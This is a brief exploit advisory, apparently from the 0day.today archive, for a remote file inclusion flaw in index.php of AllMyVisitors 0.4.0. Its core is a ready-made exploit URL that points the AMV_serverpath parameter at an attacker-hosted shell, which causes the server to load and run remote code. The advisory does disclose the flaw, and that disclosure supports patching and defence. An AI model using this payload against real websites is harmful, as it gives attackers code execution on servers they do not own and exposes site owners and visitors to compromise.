id: 1373
date: 01/07/2007
title: AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability
author: bd0rk
cves: 

===================================================================
AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability
===================================================================



Affected Software: AllMyVisitors 0.4.0

Vulnerable Code in index.php

Bugfounder: bd0rk

[+]Exploit: http://[target]/[all_my_visitors_path]/index.php?AMV_openconfig=1&AMV_serverpath=http://[Shell]




#  0day.today [2023-03-27]  #